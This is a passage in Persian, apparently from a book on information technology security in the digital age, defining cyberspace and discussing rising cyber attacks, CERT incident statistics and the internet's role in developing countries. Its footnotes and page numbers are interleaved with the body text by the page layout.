‫ﺑﺮ ﺁﺯﺍﺩﻳﻬﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﮔﺎﻣﻬـﺎﻱ‬
‫ﻣﺆﺛﺮﻱ ﺑﺮﺩﺍﺭﻧﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻧﺪ ﺍﮔـﺮ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺁﺯﺍﺩﻳﻬـﺎﻱ ﻓﻌﻠـﻲ ﺭﺍ ﺗﻘﻮﻳـﺖ ﻧﻤـﻲﻛﻨﻨـﺪ‪،‬‬
‫ﺣﺪﺍﻗﻞ ﻳﻚ ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‪ ١٥‬ﺷـﻨﺎﺧﺘﻪ‬
‫ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺷﻮﺩ ﻭ ﺗﻌﺮﻳﻒ ﺁﻥ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛـﻪ‬
‫ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ ﻣـﻲ ﺷـﻮﻧﺪ ﻭ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ‪ ١٦.‬ﺩﺭ‬
‫ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻢ ﻣﺜﻞ ﻓﻀﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﻣﻼﻗﺎﺗﻬﺎ‬
‫ﻭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺻﺤﺒﺖ ﻛﺮﺩ‪ ،‬ﺍﻣـﺎ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺭﻓﺘـﺎﺭ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺳﺎﻳﺒﺮ ﻭ ﺩﻧﻴﺎﻱ ﺣﻘﻴﻘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺯﻧﺪﮔﻲ‪ ،‬ﻛﺎﺭ ﻭ ﺑﺎﺯﻱ ﻣﻲﻛﻨـﻴﻢ‬
‫ﺗﻔﺎﻭﺕ ﻗﺎﺋﻞ ﺷﺪ‪.‬‬
‫ﮔــﺴﺘﺮﺵ ﻭ ﺭﻭﺍﺝ ﺳــﺮﻳﻊ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﺷﺨــﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧــﺖ ﺩﺭ‬
‫ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻨـﺎﻓﻊ ﺑـﺴﻴﺎﺭﻱ‬
‫ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺨﻮﺩﻱ ﺧﻮﺩ ﺭﺳـﺎﻧﻪﺍﻱ ﻧﻴـﺴﺖ‬
‫ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﺭﻓﺘﺎﺭ ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﺍﻳﻤﻨﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻫﺰﻳﻨـﺔ ﻋـﺪﻡ‬
‫ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﻮﺭﺩ‬
‫ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﺑـﺰﺭﮒ ﻳـﺎ ﻣﺆﺳـﺴﺔ ﺩﻭﻟﺘـﻲ‬
‫ﺑﺎﺷﺪ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻫﻴﺘﹰﺎ ﺍﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﺍﻣﺎ ﻫﺰﻳﻨـﺔ‬
‫ﺍﻣﻦ ﻛﺮﺩﻥ ﺁﻥ ﻧﻴﺰ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻫﺰﻳﻨﺔ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎﻱ‬
‫‪۱۶‬‬
‫‪Cyberspace‬‬
‫"ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ" ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺗﻮﺳـﻂ ﻳـﻚ ﻧﻮﻳـﺴﻨﺪﻩ ﺑـﻪ ﻧـﺎﻡ ‪William‬‬
‫‪ Gibson‬ﺑﺮﺍﻱ ﻳﻚ ﺩﻧﻴﺎﻱ ﻣﻮﺍﺯﻱ ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺮﺍﺳﺮ ﺩﻧﻴـﺎ‬
‫ﺳـــﺎﺧﺘﻪ ﺷـــﺪﻩ ﺑـــﻮﺩ ﺩﺭ ﺳـــﺎﻝ ‪ ۱۹۸۴‬ﻭ ﺩﺭ ﺭﻣـــﺎﻥ ﺍﻭ ﺑـــﺎ ﻋﻨـــﻮﺍﻥ‬
‫"‪ "Neuromancer‬ﺑﻜﺎﺭ ﺭﻓﺖ‪ .‬ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺩﺑﻴﺎﺕ ﻣﻔﻴﺪ‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻣﻌﻨﻲ ﺁﻥ ﺑﺘﺪﺭﻳﺞ ﺍﺯ ﺁﻧﭽﻪ ‪ Gibson‬ﻣﺪ ﻧﻈﺮ ﺩﺍﺷـﺖ ﺗﻐﻴﻴـﺮ‬
‫ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻫﻤﻴﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﻭ‬
‫ﻳﺎ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪Intven, et al., Legal and Regulatory Aspects of‬‬
‫‪e-Commerce and the Internet, World Bank‬‬
‫)‪Legal Review, vol. 1 2003, at fn 17. (Kluwer‬‬
‫ﺍﺭﺯﺷﻤﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻧﻤﻲﺑﺎﺷـﺪ‪ .‬ﺍﺯ‬
‫ﺩﻳﮕﺮ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺎﺷﺪ ﺁﻧـﺴﺖ ﻛـﻪ ﺗـﺄﺛﻴﺮ‬
‫ﺳﺮﻗﺖ ﻭ ﻭﻗﻮﻉ ﺗﺨﻠﻒ ﻣﺎﻟﻲ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﻣﺤﺼﻮﺭ ﺑﻪ ﺁﻥ‬
‫ﺷﺮﻛﺖ ﻧﻴﺴﺖ ﻭ ﺩﺭ ﻛﻞ ﺻﻨﻌﺖ ﻛﺸﻮﺭ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﺩ‪.‬‬
‫ﺑﺎ ﮔﺴﺘﺮﺵ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ‬
‫ﺣﻤﻼﺕ ﺳﺎﻳﺒﺮ‪ ،١٧‬ﺗﻌﺪﺍﺩ ﭼﻨﻴﻦ ﺣﻮﺍﺩﺛﻲ ﻧﻴﺰ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‪:‬‬
‫"ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﻧﻘﻄﺔ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤـﻼﺕ‬
‫ﺗﺮﻭﺭﻳﺴﺘﻲ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭﻧﻈـﺮ ﺩﺍﺷـﺖ ﻛـﻪ‬
‫ﺑﺮﺧﻲ ﺍﻗﺪﺍﻣﺎﺕ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﻧﺪ ﻛـﻪ‬
‫ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﻧﺒﺎﻝ ﻛﺴﺐ ﺩﺭﺁﻣﺪ ﻫﺴﺘﻨﺪ‪ .‬ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ )‪ ١٨(CERT‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻣـﻴﻼﺩﻱ ﺭﻗﻤـﻲ ﺑﺮﺍﺑـﺮ ﺑـﺎ‬
‫‪ ۵۲۶۵۸‬ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﻛـﻪ ﺩﻭ ﺑﺮﺍﺑـﺮ‬
‫ﺗﻌﺪﺍﺩ ﻳﻜﺴﺎﻝ ﻗﺒﻠﺘﺮ ﺍﺳﺖ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺩﻭ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺁﻥ ﭼﻬﺎﺭ‬
‫‪١٩‬‬
‫ﺑﺮﺍﺑﺮ ﻣﻲﺑﺎﺷﺪ‪".‬‬
‫ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻮﺍﺻﻞ ﺭﺍ ﺍﺯ‬
‫ﻣﻴﺎﻥ ﺑﺮﺩﺍﺭﺩ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﺑﻲﺷﻤﺎﺭﻱ ﺭﺍ ﻓـﺮﺍﻫﻢ ﻛﻨـﺪ‪.‬‬
‫ﺑــﺎ ﻭﺟــﻮﺩ ﺷــﺒﻜﺔ ﺟﻬــﺎﻧﻲ ﻭﺏ‪ ،‬ﺍﻳﻨﺘﺮﻧــﺖ ﻗــﺎﺩﺭ ﺧﻮﺍﻫــﺪ ﺑــﻮﺩ ﺍﺯ‬
‫ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺩﺭﺑــﺎﺭﺓ ﺷــﺮﻛﺘﻬﺎ‪ ،‬ﺍﻣﻜﺎﻧــﺎﺕ‪ ،‬ﻭ ﻣﺤــﺼﻮﻻﺕ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﻭ ﺗﺠـﺎﺭﺕ ﺭﺍ ﺩﺭ ﺁﻧﻬـﺎ‬
‫ﺗﻮﺳــﻌﻪ ﺩﻫــﺪ‪ .‬ﻋــﻼﻭﻩ ﺑــﺮ ﺍﻳــﻦ‪ ،‬ﻣﻮﺗﻮﺭﻫــﺎﻱ ﺟــﺴﺘﺠﻮ ﺍﺯ ﻧﻈــﺮ‬
‫ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﺗﻤﺎﻳﺰﻱ ﻣﻴﺎﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻗﺎﺋـﻞ ﻧﻤـﻲ ﺷـﻮﻧﺪ؛ ﻭ‬
‫ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺗﺄﻣﻴﻦ ﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻭ ﻛﺎﻻﻫﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﻣﻮﺍﺩ‬
‫ﺍﻭﻟﻴـــﺔ ﻛـــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـــﺎﻝ ﺗﻮﺳـــﻌﻪ ﺭﻭﻱ ﻭﺏ ﺩﺭ ﻛﻨـــﺎﺭ‬
‫ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﻛﺎﻻﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﻗـﺮﺍﺭ‬
‫‪٢١‬‬
‫ﻣﻲﮔﻴﺮﻧﺪ‪ ٢٠.‬ﺍﻳﻦ ﺍﻣﺮ ﺭﺍ ﮔﺎﻫﻲ "ﻣـﺮﮒ ﻓﺎﺻـﻠﻪﻫـﺎ" ﻣـﻲﻧﺎﻣﻨـﺪ؛‬
‫ﻭﺍﮊﻩﺍﻱ ﻛﻪ ﺭﻭﻧﺪ ﺟﺮﻳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪.‬‬
‫‪Cyber Attacks‬‬
‫‪Computer Emergency Response Team‬‬
‫‪Reuters/USA Today, April 16, 2003‬‬
‫‪15‬‬
‫‪۲۰‬‬
‫ﺩﺭ ﺣﻘﻴﻘﺖ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ﺑـﺮ ﺍﺳـﺎﺱ ﺯﺑـﺎﻥ ﻣﻴـﺎﻥ ﭘﺎﺳـﺨﻬﺎﻱ‬
‫ﻳﺎﻓﺘﻪﺷﺪﻩ ﺗﻔﺎﻭﺕ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ ،‬ﻭ ﻟﺬﺍ ﺩﺭ ﺑﺎﺯﺍﺭ ﺟﻬﺎﻧﻲ ﻫﺮ ﻛـﺲ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺯﺑﺎﻥ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﺧﻮﺩ ﺻـﺤﺒﺖ ﻛﻨـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﺗﺤﻤﻞ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻨﺘﻈـﺮ ﺩﺭﻳﺎﻓـﺖ‬
‫ﭘﺎﺳﺦ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﺭﺗﺒﺎﻃـﺸﺎﻥ ﻛﻨـﺪ ﺍﺳـﺖ‪ .‬ﺩﺭ ﻫﺮﺣـﺎﻝ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻣﻴﺰﺑﺎﻧﻲ‬
‫ﻛﻨﻨﺪ ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﻞ ﻣﻴﺰﺑﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺑﺮﮔﺰﻳﻨﻨـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﻪ‬
‫ﺑﺎﺯﺍﺭﻫــﺎﻱ ﻫــﺪﻑ ﻧﺰﺩﻳــﻚ ﺑﺎﺷــﺪ‪ .‬ﺑﻌــﻀﻲ ﺍﺯ ﺷــﺮﻛﺘﻬﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ‬
‫ﺍﻧﻌﻜﺎﺳﻲ )‪ (mirror sites‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨـﻲ ﻛـﻪ ﻳـﻚ‬
‫‪17‬‬
‫‪18‬‬
‫‪19‬‬
‫‪٣١‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﻇﻮﺍﻫﺮ ﺧﻮﺏ ﻭ ﺑﺪ ﺍﻧﺴﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻣـﻀﺎﻣﻴﻦ‬
‫ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﻭﻳــﺮﺍﻳﺶ ﺁﻧﻬــﺎ ﺁﺳــﺎﻥ ﺍﺳــﺖ‪ ،‬ﻣﻐﺎﻟﻄــﻪ ﻭ ﺗﺤﺮﻳــﻒ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺜﻞ ﺟﻌﻞ ﻣﺴﺘﻨﺪﺍﺕ ﺍﺩﺍﺭﻱ ﻭ ﺭﺳﻤﻲ ﺁﺳﺎﻥ ﻣﻲﺷـﻮﺩ‪.‬‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺁﻧﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻳﻚ ﻣﺤﻴﻂ ﭘﮋﻭﻫﺸﻲ ﻭ ﺗﻌﺎﻭﻧﻲ ﺷـﺮﻭﻉ‬
‫ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻫﺪﻑ ﺁﻥ ﺍﺷﺘﺮﺍﻙ ﺁﺳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺑـﻮﺩ‪ ،‬ﺳـﺎﺧﺘﺎﺭ‬
‫ﺁﻥ ﺑﺎﻋــﺚ ﺗــﺴﻬﻴﻞ ﺣﻤﻠــﻪ ﺑــﻪ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻭ ﺳــﺮﻗﺖ ﺍﻃﻼﻋــﺎﺕ‬
‫ﻣﺤﺮﻣﺎﻧﻪ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺍﻧﮕﻴﺰﺓ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﭼﻨﻴﻦ ﺭﻓﺘﺎﺭﻱ ﺍﺯ ﺧﻮﺩ ﺑـﺮﻭﺯ‬
‫ﻣﻲﺩﻫﻨﺪ ﺷﺒﻴﻪ ﺍﻧﮕﻴﺰﻩﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ‬
‫ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ‪ :‬ﻣﺤﻴﻄﻲ‬
‫ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺷـﺪﻩ ﺩﺭ ﺍﻓـﺮﺍﺩ‬
‫ﺍﻳﻦ ﺗﻤﺎﻳﻞ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﺛﺎﺑﺖ ﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ‬
‫ﻧﺴﺨﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﻣﺘﻔﺎﻭﺕ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﻛﻨﻨـﺪ‬
‫ﺗﺎ ﺯﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺣﺪﺍﻗﻞ ﺷﻮﺩ‪.‬‬
‫‪Cairncross, F., The Death of Distance: How‬‬
‫‪the Communications Revolution will Change‬‬
‫‪our Lives, Harvard Business School Press‬‬
‫‪(1997).‬‬
‫‪Millennium Development Goals‬‬
‫‪۲۳‬‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻜﻲ ﺍﺯ ﺳﻪ ﻣﻮﺿـﻮﻉ ﺍﺻـﻠﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ‬
‫ﺍﺟﻼﺱ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺲ ﺧـﻮﺩ ﺩﺭ ﺟﻨـﻮﺍ )ﺩﺳـﺎﻣﺒﺮ‬
‫‪ (۲۰۰۳‬ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎﺯ ﻫﻢ ﺩﺭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳـﻞ ‪(۲۰۰۵‬‬
‫ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻳﻚ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻦ ﻭﺍﻗﻌﻴـﺖ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻧﻘﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺭ ﺗﻮﺳـﻌﻪ ﺑﺘـﺪﺭﻳﺞ ﺑـﻪ ﺟﺎﻳﮕـﺎﻩ‬
‫ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﻧﺰﺩﻳﻜﺘﺮ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﻫﺮ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﺍﺯ‬
‫ﻛﺴﺐ ﺩﺍﻧﺴﺘﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺩﺭﺑﺎﺭﺓ ﺭﺍﻳﺎﻧﻪ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﻣﻬﺎﺭﺗﻬﺎﻳﺘﺎﻥ ﺑﻲ ﻧﻴﺎﺯ ﻧﻤﻲ ﻛﻨﺪ‪ .‬ﺍﻣـﺮﻭﺯﻩ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﺩﺭﻭﺍﺯﺓ ﻭﺭﻭﺩ ﺑﻪ ﺩﻧﻴﺎﻱ ﺷﮕﻔﺖ ﺍﻧﮕﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻭ ﺩﺍﻧﺴﺘﻪﻫﺎ ﺍﺳﺖ‬
‫ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑـﺎ ﻗﻴﻤـﺖ ﺑـﺴﻴﺎﺭ ﻧـﺎﺯﻝ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻣﻲ ﺗـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺼﻮﺭﺕ‬
‫ﻛﺎﺭﺁﻣﺪ ﻭ ﻣﺆﺛﺮﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ‬
‫ﺍﻳﻦ ﻫﺪﻑ ﻻﺯﻡ ﺍﺳﺖ ﺍﻣﻜﺎﻧﺎﺕ ﻭ ﺭﻓﺘﺎﺭﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ‪ .‬ﺑﺎ ﻣﻔﻬﻮﻡ ﻫﻮﺷﻴﺎﺭﻱ ﺩﺭ‬
‫ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ‪ .‬ﺍﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺑﻴـﺎﻣﻮﺯﻳﻢ ﻛـﻪ ﭼﮕﻮﻧـﻪ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻮﺷﻴﺎﺭﻱ )ﻫﻮﺷﻴﺎﺭﻱ ﺳـﺎﻳﺒﺮ( ﺭﺳـﻴﺪ‪.‬‬
